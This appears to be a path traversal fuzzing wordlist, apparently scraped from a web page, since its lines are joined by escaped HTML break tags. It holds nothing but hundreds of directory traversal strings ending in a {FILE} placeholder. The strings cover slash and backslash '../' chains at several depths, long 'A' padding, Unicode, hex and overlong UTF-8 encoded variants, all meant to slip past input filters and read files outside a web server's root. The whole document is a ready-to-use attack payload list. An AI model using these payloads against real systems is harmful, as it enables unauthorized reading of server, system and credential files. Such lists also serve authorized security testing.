AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
